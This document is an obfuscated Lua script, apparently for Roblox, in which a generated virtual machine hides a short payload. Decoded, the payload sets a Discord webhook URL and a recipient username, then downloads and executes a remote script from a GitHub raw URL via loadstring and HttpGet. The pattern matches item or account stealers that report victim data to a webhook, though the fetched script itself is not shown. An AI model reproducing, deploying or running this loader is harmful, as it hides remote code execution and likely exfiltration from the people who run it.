--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v30,16));if v19 then local v100=v5(v69,v19);v19=nil;return v100;else return v69;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -(1 + 2))^(v32-1)))%((5 -(880 -(282 + 595)))^(((v33-1) -(v32-(1 -0))) + (2 -(1638 -(1523 + 114))))) ;return v70-(v70%(620 -(555 + 64))) ;else local v71=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v71 + v71))>=v71) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=0;local v35;while true do if (v34==1) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=(2336 -(226 + 1044)) -(68 + 997) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (8 -6) ;return (v37 * (373 -(32 + 85))) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) + 0 );v18=v18 + 1 + 3 ;return (v41 * (16778173 -(892 + 65))) + (v40 * (156337 -90801)) + (v39 * (472 -216)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=351 -((334 -247) + 261 + 2) ;local v45=(v20(v43,181 -(67 + 113) ,20) * (2^(24 + 8))) + v42 ;local v46=v20(v43,51 -30 ,31);local v47=((v20(v43,(815 -(368 + 423)) + 8 )==1) and  -(3 -2)) or (953 -(802 + 150)) ;if (v46==(0 -0)) then if (v45==((0 -0) -(442 -(416 + 26)))) then return v47 * (0 + 0) ;else local v75=(3183 -2186) -(393 + 522 + 82) ;while true do if (v75==(0 -0)) then v46=1;v44=0 + 0 ;break;end end end elseif (v46==(2691 -644)) then return ((v45==((2100 -913) -(1069 + 118))) and (v47 * ((2 -1)/(438 -(145 + 293))))) or (v47 * NaN) ;end return v8(v47,v46-(2237 -1214) ) * (v44 + (v45/(((431 -(44 + 386)) + (19 -(10 + 8)))^(92 -40)))) ;end local function v25(v48)local v49=1486 -(998 + 488) ;local v50;local v51;while true do if (v49==((1433 -(630 + 793)) -7)) then return v6(v51);end if (v49==(0 + 0)) then v50=nil;if  not v48 then local v92=0 + 0 ;while true do if (v92==(772 -(201 + 571))) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=1 + 0 ;end if (v49==2) then v51={};for v76=1139 -(116 + 1022) , #v50 do v51[v76]=v2(v1(v3(v50,v76,v76)));end v49=(3008 -2120) -(261 + 624) ;end if (v49==(1 -0)) then v50=v3(v16,v18,(v18 + v48) -(1081 -(1020 + (284 -224))) );v18=v18 + v48 ;v49=8 -6 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=0) then else v53=1199 -(1026 + 173) ;v54=nil;v52=1 -0 ;end if ((66 -(30 + 35))~=v52) then else v55=nil;v56=nil;v52=2 + 0 ;end if (2~=v52) then else v57=nil;v58=nil;v52=1260 -(1043 + 214) ;end if (v52~=(11 -8)) then else v59=nil;v60=nil;v52=4;end if (v52~=4) then else while true do if (v53==(1215 -(323 + 889))) then v60=nil;while true do local v101=0 -0 ;while true do if (v101==(580 -(361 + 219))) then local v106=320 -(53 + 267) ;while true do if (v106==0) then if ((1 + 1)==v54) then local v127=413 -(15 + 398) ;local v128;while true do if (v127~=(982 -(18 + 964))) then else v128=0;while true do if (0==v128) then local v169=0 -0 ;while true do if (v169==1) then v128=1 + 0 ;break;end if (v169==(0 + 0)) then for v180=1,v59 do local v181=0;local v182;local v183;local v184;local v185;while true do if (v181==(852 -(20 + 830))) then while true do if ((1 + 0)~=v182) then else v185=nil;while true do if (v183==0) then local v196=126 -(116 + 10) ;local v197;while true do if (v196==0) then v197=0;while true do if (1==v197) then v183=1;break;end if (0==v197) then local v202=0;while true do if (v202==1) then v197=1 + 0 ;break;end if (v202==0) then v184=v21();v185=nil;v202=1;end end end end break;end end end if ((739 -(542 + 196))~=v183) then else if (v184==(1 -0)) then v185=v21()~=0 ;elseif (v184==(1 + 1)) then v185=v24();elseif (v184==3) then v185=v25();end v60[v180]=v185;break;end end break;end if (v182==(0 + 0)) then local v189=0;while true do if (v189==(0 + 0)) then v183=0 -0 ;v184=nil;v189=1;end if (v189==(2 -1)) then v182=1;break;end end end end break;end if (v181==1) then v184=nil;v185=nil;v181=1553 -(1126 + 425) ;end if (v181~=0) then else v182=0;v183=nil;v181=406 -(118 + 287) ;end end end v58[3]=v21();v169=1;end end end if (v128==(3 -2)) then for v171=1,v23() do local v172=0;local v173;local v174;local v175;while true do if (v172==(1122 -(118 + 1003))) then v175=nil;while true do if (v173==(2 -1)) then while true do if (v174==0) then v175=v21();if (v20(v175,1,378 -(142 + 235) )==(0 -0)) then local v190=0 + 0 ;local v191;local v192;local v193;local v194;local v195;while true do if (v190==(978 -(553 + 424))) then v193=nil;v194=nil;v190=2;end if ((3 -1)==v190) then v195=nil;while true do if (v191==(1 + 0)) then local v199=0 + 0 ;local v200;while true do if (0~=v199) then else v200=0;while true do if (v200~=0) then else v194=nil;v195=nil;v200=1 + 0 ;end if (v200==1) then v191=2;break;end end break;end end end if (v191~=0) then else local v201=0 + 0 ;while true do if (v201~=(0 + 0)) then else local v203=0;while true do if (v203~=(0 -0)) then else v192=0 -0 ;v193=nil;v203=2 -1 ;end if (v203==1) then v201=1;break;end end end if (v201==1) then v191=1 + 0 ;break;end end end if (v191==2) then while true do if ((9 -7)~=v192) then else local v204=753 -(239 + 514) ;while true do if (v204==0) then local v214=0;while true do if (v214~=(0 + 0)) then else if (v20(v194,1330 -(797 + 532) ,1)==1) then v195[2]=v60[v195[2]];end if (v20(v194,2,2)==(1 + 0)) then v195[3]=v60[v195[3]];end v214=1;end if (1==v214) then v204=1;break;end end end if (v204==1) then v192=2 + 1 ;break;end end end if (3==v192) then if (v20(v194,6 -3 ,1205 -(373 + 829) )==(732 -(476 + 255))) then v195[4]=v60[v195[1134 -(369 + 761) ]];end v55[v171]=v195;break;end if (v192~=(1 + 0)) then else local v206=0 -0 ;local v207;local v208;while true do if (v206==(0 -0)) then v207=0;v208=nil;v206=239 -(64 + 174) ;end if (v206==1) then while true do if (0~=v207) then else v208=0 + 0 ;while true do if (v208==0) then local v219=0 -0 ;while true do if ((337 -(144 + 192))==v219) then v208=1;break;end if (v219~=(216 -(42 + 174))) then else local v222=0 + 0 ;while true do if (v222~=0) then else v195={v22(),v22(),nil,nil};if (v193==(0 + 0)) then local v224=1504 -(363 + 1141) ;local v225;while true do if (v224==0) then v225=0;while true do if (v225==(1580 -(1183 + 397))) then v195[8 -5 ]=v22();v195[3 + 1 ]=v22();break;end end break;end end elseif (v193==(1 + 0)) then v195[3]=v23();elseif (v193==2) then v195[3]=v23() -((1977 -(1913 + 62))^(11 + 5)) ;elseif (v193~=(7 -4)) then else local v230=1933 -(565 + 1368) ;local v231;while true do if (v230==0) then v231=0 -0 ;while true do if ((1661 -(1477 + 184))~=v231) then else v195[3]=v23() -(2^(21 -5)) ;v195[4]=v22();break;end end break;end end end v222=1 + 0 ;end if (v222~=(857 -(564 + 292))) then else v219=1;break;end end end end end if (v208~=(1 -0)) then else v192=2;break;end end break;end end break;end end end if (v192==(0 -0)) then local v209=0;local v210;local v211;while true do if (0~=v209) then else v210=0;v211=nil;v209=1;end if (v209~=1) then else while true do if (v210==0) then v211=0;while true do if (v211==1) then v192=1;break;end if (v211~=(304 -(244 + 60))) then else local v220=0 + 0 ;local v221;while true do if (v220==0) then v221=476 -(41 + 435) ;while true do if (v221==1) then v211=1002 -(938 + 63) ;break;end if (v221==0) then local v223=0 + 0 ;while true do if (v223==(1125 -(936 + 189))) then v193=v20(v175,2,1 + 2 );v194=v20(v175,1617 -(1565 + 48) ,6);v223=1;end if (v223~=1) then else v221=1 + 0 ;break;end end end end break;end end end end break;end end break;end end end end break;end end break;end if (v190~=0) then else v191=1138 -(782 + 356) ;v192=nil;v190=268 -(176 + 91) ;end end end break;end end break;end if (v173==(0 -0)) then local v186=0 -0 ;while true do if (1==v186) then v173=1;break;end if (v186==(1092 -(975 + 117))) then v174=0;v175=nil;v186=1876 -(157 + 1718) ;end end end end break;end if ((0 + 0)~=v172) then else v173=0 -0 ;v174=nil;v172=1;end end end v54=10 -7 ;break;end end break;end end end if (v54==3) then local v129=1018 -(697 + 321) ;local v130;local v131;while true do if (v129==0) then v130=0 -0 ;v131=nil;v129=1;end if (1~=v129) then else while true do if (v130~=(0 -0)) then else v131=0;while true do if (v131==0) then local v179=0;while true do if (0==v179) then for v187=1,v23() do v56[v187-1 ]=v28();end return v58;end end end end break;end end break;end end end v106=1;end if (1==v106) then v101=2 -1 ;break;end end end if (v101~=1) then else if (v54~=(0 + 0)) then else local v107=0 -0 ;local v108;local v109;while true do if (v107~=1) then else while true do if (v108==0) then v109=0 -0 ;while true do if (v109~=(1228 -(322 + 905))) then else v57={};v54=612 -(602 + 9) ;break;end if (v109==(1189 -(449 + 740))) then local v170=0;while true do if (v170~=1) then else v109=1;break;end if ((872 -(826 + 46))~=v170) then else v55={};v56={};v170=1;end end end end break;end end break;end if (v107==(947 -(245 + 702))) then v108=0 -0 ;v109=nil;v107=1 + 0 ;end end end if (v54==(1899 -(260 + 1638))) then local v110=440 -(382 + 58) ;local v111;while true do if ((0 -0)==v110) then v111=0;while true do if (0==v111) then local v161=0;while true do if (v161==(0 + 0)) then v58={v55,v56,nil,v57};v59=v23();v161=1;end if (v161~=1) then else v111=1;break;end end end if (v111==1) then v60={};v54=2;break;end end break;end end end break;end end end break;end if (v53==(1 -0)) then local v96=0 -0 ;local v97;while true do if (v96==0) then v97=0 + 0 ;while true do if (v97==(1691 -(1121 + 569))) then v53=2;break;end if (0==v97) then local v112=214 -(22 + 192) ;while true do if (v112==(683 -(483 + 200))) then v56=nil;v57=nil;v112=1464 -(1404 + 59) ;end if (v112~=(2 -1)) then else v97=1;break;end end end end break;end end end if (2~=v53) then else local v98=0 -0 ;while true do if (v98==1) then v53=768 -(468 + 297) ;break;end if ((562 -(334 + 228))~=v98) then else v58=nil;v59=nil;v98=3 -2 ;end end end if (0==v53) then local v99=0 -0 ;while true do if (v99==(1 -0)) then v53=1 + 0 ;break;end if (v99==(236 -(141 + 95))) then v54=0 + 0 ;v55=nil;v99=1;end end end end break;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (1==v64) then v67=v61[3];return function(...)local v78=v65;local v79=v66;local v80=v67;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v93=0,v86 do if (v93>=v80) then v84[v93-v80 ]=v85[v93 + 1 ];else v88[v93]=v85[v93 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=10) then if (v91<=4) then if (v91<=1) then if (v91==0) then v88[v90[2]]();else v88[v90[2]][v90[3]]=v90[4];end elseif (v91<=2) then local v115=v90[2];local v116=v88[v90[3]];v88[v115 + 1 ]=v116;v88[v115]=v116[v90[4]];elseif (v91==3) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end else local v132=0;local v133;local v134;local v135;local v136;while true do if (v132==0) then v133=v90[2];v134,v135=v81(v88[v133](v13(v88,v133 + 1 ,v90[3])));v132=1;end if (v132==1) then v83=(v135 + v133) -1 ;v136=0;v132=2;end if (v132==2) then for v165=v133,v83 do local v166=0;while true do if (0==v166) then v136=v136 + 1 ;v88[v165]=v134[v136];break;end end end break;end end end elseif (v91<=7) then if (v91<=5) then v82=v90[3];elseif (v91==6) then v88[v90[2]][v90[3]]=v90[4];else v88[v90[2]]=v63[v90[3]];end elseif (v91<=8) then v88[v90[2]]=v90[3]~=0 ;elseif (v91==9) then do return;end else v88[v90[2]]=v90[3];end elseif (v91<=15) then if (v91<=12) then if (v91==11) then v88[v90[2]]=v90[3];else v88[v90[2]]=v63[v90[3]];end elseif (v91<=13) then v88[v90[2]]=v90[3]~=0 ;elseif (v91>14) then local v143=0;local v144;while true do if (v143==0) then v144=v90[2];v88[v144]=v88[v144](v13(v88,v144 + 1 ,v83));break;end end else local v145=v90[2];local v146=v88[v90[3]];v88[v145 + 1 ]=v146;v88[v145]=v146[v90[4]];end elseif (v91<=18) then if (v91<=16) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91>17) then v88[v90[2]]();else local v151=v90[2];local v152,v153=v81(v88[v151](v13(v88,v151 + 1 ,v90[3])));v83=(v153 + v151) -1 ;local v154=0;for v158=v151,v83 do local v159=0;while true do if (v159==0) then v154=v154 + 1 ;v88[v158]=v152[v154];break;end end end end elseif (v91<=19) then do return;end elseif (v91==20) then local v155=v90[2];v88[v155]=v88[v155](v13(v88,v155 + 1 ,v83));else v82=v90[3];end v82=v82 + 1 ;end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3137353031342O33363O382O393733362F5A326A466276364C6946673876644565424D2D6B42757A6E5F6777427755773179525531633867372O6E6A4161563774705A487034437738784B424B7531356575632D57030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030E3O00636F7570666174616C636F75703203093O00557365724E616D653200173O00120A3O00013O0026033O000E000100020004053O000E0001001207000100033O003001000100040005001207000100063O001207000200073O00200E00020002000800120A000400094O0008000500014O0004000200054O001400013O00024O0001000100010004053O001600010026033O0001000100010004053O00010001001207000100033O0030010001000A000B001207000100033O0030010001000C000B00120A3O00023O0004053O000100012O00133O00017O00",v9(),...);end
